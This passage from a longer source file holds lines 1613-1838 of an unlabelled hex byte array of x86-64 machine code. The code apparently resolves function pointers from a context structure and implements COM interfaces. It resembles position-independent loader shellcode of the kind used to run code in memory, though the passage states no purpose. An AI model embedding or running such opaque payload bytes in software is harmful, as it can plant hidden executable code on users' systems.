1613 0x00, 0xff, 0xd0, 0x48, 0x8d, 0x85, 0x10, 0x03, 0x00, 0x00, 0x48, 0x89,
1614 0x85, 0x70, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x70, 0x03, 0x00, 0x00,
1615 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0x79,
1616 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xe0, 0x02, 0x00, 0x00, 0x48, 0x89,
1617 0x85, 0x80, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85, 0x70, 0x03, 0x00, 0x00,
1618 0x48, 0x83, 0xc0, 0x10, 0x48, 0x89, 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04,
1619 0x00, 0x00, 0xe8, 0x8c, 0x07, 0x00, 0x00, 0x48, 0x8d, 0x85, 0xf0, 0x01,
1620 0x00, 0x00, 0x48, 0x89, 0x85, 0x98, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x85,
1621 0x70, 0x03, 0x00, 0x00, 0x48, 0x83, 0xc0, 0x28, 0x48, 0x89, 0xc2, 0x48,
1622 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0x10, 0x09, 0x00, 0x00, 0x48,
1623 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x80, 0x01, 0x00,
1624 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0xb9, 0x00, 0x00, 0x00, 0x00, 0xff,
1625 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00,
1626 0x00, 0x00, 0x0f, 0x85, 0x89, 0x02, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10,
1627 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x88, 0x01, 0x00, 0x00, 0x48, 0x8b,
1628 0x95, 0x10, 0x04, 0x00, 0x00, 0x4c, 0x8d, 0x82, 0xa4, 0x08, 0x00, 0x00,
1629 0x48, 0x8b, 0x95, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x8a, 0x84, 0x08,
1630 0x00, 0x00, 0x48, 0x8d, 0x95, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54,
1631 0x24, 0x20, 0x4d, 0x89, 0xc1, 0x41, 0xb8, 0x03, 0x00, 0x00, 0x00, 0xba,
1632 0x00, 0x00, 0x00, 0x00, 0xff, 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00,
1633 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x30, 0x02, 0x00,
1634 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c,
1635 0x8b, 0x08, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8d, 0x90,
1636 0xe4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48,
1637 0x8d, 0x8d, 0xe0, 0x03, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc1,
1638 0x41, 0xff, 0xd1, 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0,
1639 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0xb7, 0x01, 0x00, 0x00, 0x48, 0x8b,
1640 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x18,
1641 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1642 0x89, 0x85, 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00,
1643 0x00, 0x0f, 0x85, 0x70, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1644 0x00, 0x00, 0x48, 0x89, 0x85, 0xb0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85,
1645 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x40, 0x18, 0x48,
1646 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8d, 0x95, 0x70, 0x03, 0x00,
1647 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xf0, 0x03, 0x00,
1648 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x0f, 0x85, 0x2d, 0x01,
1649 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x05, 0xe5,
1650 0x05, 0x00, 0x00, 0x48, 0x8d, 0x55, 0xe0, 0x49, 0x89, 0xd0, 0x48, 0x89,
1651 0xc2, 0x48, 0x8b, 0x8d, 0x10, 0x04, 0x00, 0x00, 0xe8, 0xf0, 0xbd, 0xff,
1652 0xff, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x90, 0x08,
1653 0x01, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xe0, 0x48, 0x89, 0xc1, 0xff, 0xd2,
1654 0x48, 0x89, 0x85, 0xe8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1655 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x48, 0x40, 0x48, 0x8b, 0x85,
1656 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x95, 0xe8, 0x03, 0x00, 0x00, 0x41,
1657 0xb8, 0x02, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd1, 0x89,
1658 0x85, 0xf0, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0x10, 0x04, 0x00, 0x00,
1659 0x48, 0x8b, 0x90, 0x10, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x03,
1660 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x83, 0xbd, 0xf0, 0x03, 0x00,
1661 0x00, 0x00, 0x0f, 0x85, 0x97, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0,
1662 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x28, 0x48, 0x8b,
1663 0x95, 0xe8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00,
1664 0x48, 0xc7, 0x44, 0x24, 0x48, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44,
1665 0x24, 0x40, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x44, 0x24, 0x38, 0x00, 0x00,
1666 0x00, 0x00, 0xc7, 0x44, 0x24, 0x30, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7,
1667 0x44, 0x24, 0x28, 0x00, 0x00, 0x00, 0x00, 0x48, 0xc7, 0x44, 0x24, 0x20,
1668 0x00, 0x00, 0x00, 0x00, 0x41, 0xb9, 0x00, 0x00, 0x00, 0x00, 0x41, 0xb8,
1669 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x85,
1670 0xf0, 0x03, 0x00, 0x00, 0x83, 0xbd, 0xf0, 0x03, 0x00, 0x00, 0x00, 0x75,
1671 0x26, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x4c,
1672 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00, 0xba, 0x02,
1673 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x85, 0xf0,
1674 0x03, 0x00, 0x00, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00, 0x48, 0x8b,
1675 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x85, 0xe0, 0x03, 0x00, 0x00,
1676 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0xd8, 0x03, 0x00, 0x00,
1677 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x38, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1678 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85, 0xd8, 0x03,
1679 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x10, 0x48, 0x8b, 0x85,
1680 0xd8, 0x03, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x85,
1681 0x10, 0x04, 0x00, 0x00, 0x48, 0x8b, 0x80, 0x28, 0x0d, 0x00, 0x00, 0x48,
1682 0x83, 0xc0, 0x01, 0x8d, 0x14, 0x00, 0x48, 0x8b, 0x85, 0xe8, 0x01, 0x00,
1683 0x00, 0x41, 0x89, 0xd0, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1,
1684 0xe8, 0xb3, 0x15, 0x00, 0x00, 0x48, 0xc7, 0x45, 0xd8, 0x00, 0x00, 0x00,
1685 0x00, 0x48, 0x8d, 0x4d, 0xd8, 0x48, 0x8d, 0x85, 0xe8, 0x01, 0x00, 0x00,
1686 0x48, 0x8b, 0x95, 0xf8, 0x03, 0x00, 0x00, 0x48, 0x89, 0x54, 0x24, 0x20,
1687 0x41, 0xb9, 0x00, 0x80, 0x00, 0x00, 0x49, 0x89, 0xc8, 0x48, 0x89, 0xc2,
1688 0x48, 0xc7, 0xc1, 0xff, 0xff, 0xff, 0xff, 0xe8, 0x03, 0x1e, 0x00, 0x00,
1689 0x89, 0x85, 0xf4, 0x03, 0x00, 0x00, 0x90, 0x48, 0x81, 0xc4, 0x80, 0x04,
1690 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10,
1691 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18,
1692 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48,
1693 0x8d, 0x15, 0xd5, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x45,
1694 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xb7, 0x01, 0x00, 0x00, 0x48,
1695 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1696 0x15, 0xdf, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48, 0x8b, 0x45,
1697 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x4f, 0x03, 0x00, 0x00, 0x48,
1698 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1699 0x15, 0xfc, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b, 0x45,
1700 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x62, 0x03, 0x00, 0x00, 0x48,
1701 0x89, 0x50, 0x28, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1702 0x15, 0x63, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48, 0x8b, 0x45,
1703 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x68, 0x03, 0x00, 0x00, 0x48,
1704 0x89, 0x50, 0x38, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1705 0x15, 0x62, 0x02, 0x00, 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b, 0x45,
1706 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x03, 0x00, 0x00, 0x48,
1707 0x89, 0x50, 0x48, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x00, 0x48, 0x8d,
1708 0x15, 0x53, 0x03, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48, 0x8b, 0x45,
1709 0xf8, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48, 0x8b, 0x45, 0xf8,
1710 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x58, 0x90, 0x48, 0x83, 0xc4,
1711 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48,
1712 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48,
1713 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x83, 0x7d, 0x20, 0x00,
1714 0x75, 0x0a, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xe9, 0xc0, 0x00, 0x00, 0x00,
1715 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8d, 0x88, 0x04,
1716 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00,
1717 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xbb, 0x14, 0x00, 0x00, 0x85, 0xc0, 0x74,
1718 0x25, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x58, 0x48, 0x8d, 0x88,
1719 0xb4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00,
1720 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x96, 0x14, 0x00, 0x00, 0x85, 0xc0,
1721 0x75, 0x1b, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89,
1722 0x10, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x68, 0x00, 0x00, 0x00, 0xb8, 0x00,
1723 0x00, 0x00, 0x00, 0xeb, 0x5b, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
1724 0x58, 0x48, 0x8d, 0x88, 0xc4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18,
1725 0x41, 0xb8, 0x10, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x56, 0x14,
1726 0x00, 0x00, 0x85, 0xc0, 0x75, 0x26, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8d,
1727 0x50, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x45,
1728 0xf8, 0x48, 0x83, 0xc0, 0x10, 0x48, 0x89, 0xc1, 0xe8, 0x86, 0x03, 0x00,
1729 0x00, 0xb8, 0x00, 0x00, 0x00, 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20,
1730 0x48, 0xc7, 0x00, 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80,
1731 0x48, 0x83, 0xc4, 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1732 0xec, 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89,
1733 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89,
1734 0x45, 0xf0, 0x48, 0x8b, 0x45, 0xf0, 0xba, 0x01, 0x00, 0x00, 0x00, 0xf0,
1735 0x0f, 0xc1, 0x10, 0x48, 0x8b, 0x45, 0xf8, 0x8b, 0x40, 0x08, 0x48, 0x83,
1736 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20,
1737 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8,
1738 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x83, 0xc0, 0x08, 0x48, 0x89, 0x45, 0xe8,
1739 0x48, 0x8b, 0x55, 0xe8, 0xb8, 0x01, 0x00, 0x00, 0x00, 0xf7, 0xd8, 0x89,
1740 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02, 0x01, 0xc8, 0x89, 0x45, 0xf4,
1741 0x8b, 0x45, 0xf4, 0x48, 0x83, 0xc4, 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1742 0xe5, 0x48, 0x83, 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1743 0x18, 0x44, 0x89, 0x45, 0x20, 0x4c, 0x89, 0x4d, 0x28, 0x48, 0x8b, 0x45,
1744 0x10, 0x48, 0x89, 0x45, 0xf8, 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x02, 0x85,
1745 0xc0, 0x74, 0x39, 0x48, 0x83, 0x7d, 0x30, 0x00, 0x75, 0x07, 0xb8, 0x03,
1746 0x40, 0x00, 0x80, 0xeb, 0x70, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40,
1747 0x38, 0x48, 0x8b, 0x00, 0x48, 0x8b, 0x50, 0x08, 0x48, 0x8b, 0x45, 0xf8,
1748 0x48, 0x8b, 0x40, 0x38, 0x48, 0x89, 0xc1, 0xff, 0xd2, 0x48, 0x8b, 0x45,
1749 0xf8, 0x48, 0x8b, 0x50, 0x38, 0x48, 0x8b, 0x45, 0x30, 0x48, 0x89, 0x10,
1750 0x8b, 0x45, 0x20, 0x83, 0xe0, 0x01, 0x85, 0xc0, 0x74, 0x36, 0x48, 0x83,
1751 0x7d, 0x28, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x2d,
1752 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b, 0x40, 0x28, 0x48, 0x8b, 0x40, 0x08,
1753 0x48, 0x8b, 0x55, 0xf8, 0x48, 0x83, 0xc2, 0x28, 0x48, 0x89, 0xd1, 0xff,
1754 0xd0, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8d, 0x50, 0x28, 0x48, 0x8b, 0x45,
1755 0x28, 0x48, 0x89, 0x10, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4,
1756 0x30, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xc4, 0x80, 0x48,
1757 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0xc7, 0x45, 0xac, 0x00, 0x00,
1758 0x00, 0x00, 0xc7, 0x45, 0xa8, 0x00, 0x00, 0x00, 0x00, 0xc7, 0x45, 0xa4,
1759 0x00, 0x00, 0x00, 0x00, 0x48, 0x8d, 0x45, 0xb0, 0x41, 0xb8, 0x40, 0x00,
1760 0x00, 0x00, 0xba, 0x00, 0x00, 0x00, 0x00, 0x48, 0x89, 0xc1, 0xe8, 0x19,
1761 0x12, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b,
1762 0x40, 0x18, 0x48, 0x8d, 0x55, 0xb0, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x89,
1763 0xc1, 0x41, 0xff, 0xd0, 0x89, 0x45, 0xfc, 0x83, 0x7d, 0xfc, 0x00, 0x75,
1764 0x2a, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x4c, 0x8b, 0x50, 0x20,
1765 0x4c, 0x8d, 0x45, 0xa4, 0x48, 0x8d, 0x4d, 0xa8, 0x48, 0x8d, 0x55, 0xac,
1766 0x48, 0x8b, 0x45, 0x18, 0x4d, 0x89, 0xc1, 0x49, 0x89, 0xc8, 0x48, 0x89,
1767 0xc1, 0x41, 0xff, 0xd2, 0x89, 0x45, 0xfc, 0xb8, 0x00, 0x00, 0x00, 0x00,
1768 0x48, 0x83, 0xec, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83,
1769 0xec, 0x30, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b,
1770 0x45, 0x10, 0x48, 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0x48, 0x8b,
1771 0x40, 0x58, 0x48, 0x8b, 0x40, 0x68, 0xff, 0xd0, 0x48, 0x8b, 0x55, 0x18,
1772 0x89, 0x02, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x48, 0x83, 0xc4, 0x30, 0x5d,
1773 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55,
1774 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5,
1775 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20,
1776 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1777 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d,
1778 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0xb8, 0x00, 0x00,
1779 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10,
1780 0xb8, 0x00, 0x00, 0x00, 0x00, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48,
1781 0x89, 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48,
1782 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x65, 0x00, 0x00, 0x00, 0x48, 0x89, 0x10,
1783 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xf1, 0x00,
1784 0x00, 0x00, 0x48, 0x89, 0x50, 0x08, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
1785 0x00, 0x48, 0x8d, 0x15, 0x11, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10,
1786 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x38, 0x01,
1787 0x00, 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x45, 0x18, 0x48, 0x8b,
1788 0x00, 0x48, 0x8d, 0x15, 0x39, 0x01, 0x00, 0x00, 0x48, 0x89, 0x50, 0x20,
1789 0x48, 0x8b, 0x45, 0x18, 0xc7, 0x40, 0x08, 0x00, 0x00, 0x00, 0x00, 0x48,
1790 0x8b, 0x45, 0x18, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89, 0x50, 0x10, 0x90,
1791 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x20, 0x48, 0x89,
1792 0x4d, 0x10, 0x48, 0x89, 0x55, 0x18, 0x4c, 0x89, 0x45, 0x20, 0x48, 0x83,
1793 0x7d, 0x20, 0x00, 0x75, 0x07, 0xb8, 0x03, 0x40, 0x00, 0x80, 0xeb, 0x75,
1794 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8d, 0x88, 0x04,
1795 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00, 0x00,
1796 0x00, 0x48, 0x89, 0xc2, 0xe8, 0x07, 0x11, 0x00, 0x00, 0x85, 0xc0, 0x74,
1797 0x25, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x8b, 0x40, 0x10, 0x48, 0x8d, 0x88,
1798 0xc4, 0x08, 0x00, 0x00, 0x48, 0x8b, 0x45, 0x18, 0x41, 0xb8, 0x10, 0x00,
1799 0x00, 0x00, 0x48, 0x89, 0xc2, 0xe8, 0xe2, 0x10, 0x00, 0x00, 0x85, 0xc0,
1800 0x75, 0x1b, 0x48, 0x8b, 0x45, 0x20, 0x48, 0x8b, 0x55, 0x10, 0x48, 0x89,
1801 0x10, 0x48, 0x8b, 0x4d, 0x10, 0xe8, 0x1d, 0x00, 0x00, 0x00, 0xb8, 0x00,
1802 0x00, 0x00, 0x00, 0xeb, 0x10, 0x48, 0x8b, 0x45, 0x20, 0x48, 0xc7, 0x00,
1803 0x00, 0x00, 0x00, 0x00, 0xb8, 0x02, 0x40, 0x00, 0x80, 0x48, 0x83, 0xc4,
1804 0x20, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec, 0x10, 0x48,
1805 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0, 0x08, 0x48,
1806 0x89, 0x45, 0xf8, 0x48, 0x8b, 0x45, 0xf8, 0xba, 0x01, 0x00, 0x00, 0x00,
1807 0xf0, 0x0f, 0xc1, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x8b, 0x40, 0x08, 0x48,
1808 0x83, 0xc4, 0x10, 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x83, 0xec,
1809 0x10, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x8b, 0x45, 0x10, 0x48, 0x83, 0xc0,
1810 0x08, 0x48, 0x89, 0x45, 0xf0, 0x48, 0x8b, 0x55, 0xf0, 0xb8, 0x01, 0x00,
1811 0x00, 0x00, 0xf7, 0xd8, 0x89, 0xc1, 0x89, 0xc8, 0xf0, 0x0f, 0xc1, 0x02,
1812 0x01, 0xc8, 0x89, 0x45, 0xfc, 0x8b, 0x45, 0xfc, 0x48, 0x83, 0xc4, 0x10,
1813 0x5d, 0xc3, 0x55, 0x48, 0x89, 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x48, 0x89,
1814 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00, 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x89,
1815 0xe5, 0x48, 0x89, 0x4d, 0x10, 0x89, 0x55, 0x18, 0xb8, 0x01, 0x40, 0x00,
1816 0x80, 0x5d, 0xc3, 0x55, 0x48, 0x81, 0xec, 0x30, 0x02, 0x00, 0x00, 0x48,
1817 0x8d, 0xac, 0x24, 0x80, 0x00, 0x00, 0x00, 0x48, 0x89, 0x8d, 0xc0, 0x01,
1818 0x00, 0x00, 0x48, 0x89, 0x95, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x85,
1819 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x57, 0x03,
1820 0x00, 0x00, 0x48, 0x89, 0x10, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1821 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0xff, 0x03, 0x00, 0x00, 0x48, 0x89,
1822 0x50, 0x08, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1823 0x48, 0x8d, 0x15, 0x1c, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x10, 0x48,
1824 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1825 0x40, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x18, 0x48, 0x8b, 0x85, 0xc8,
1826 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x56, 0x04, 0x00,
1827 0x00, 0x48, 0x89, 0x50, 0x20, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1828 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x9c, 0x04, 0x00, 0x00, 0x48, 0x89,
1829 0x50, 0x28, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1830 0x48, 0x8d, 0x15, 0xd3, 0x04, 0x00, 0x00, 0x48, 0x89, 0x50, 0x30, 0x48,
1831 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
1832 0x3b, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x38, 0x48, 0x8b, 0x85, 0xc8,
1833 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x39, 0x05, 0x00,
1834 0x00, 0x48, 0x89, 0x50, 0x40, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00,
1835 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15, 0x37, 0x05, 0x00, 0x00, 0x48, 0x89,
1836 0x50, 0x48, 0x48, 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00,
1837 0x48, 0x8d, 0x15, 0x35, 0x05, 0x00, 0x00, 0x48, 0x89, 0x50, 0x50, 0x48,
1838 0x8b, 0x85, 0xc8, 0x01, 0x00, 0x00, 0x48, 0x8b, 0x00, 0x48, 0x8d, 0x15,
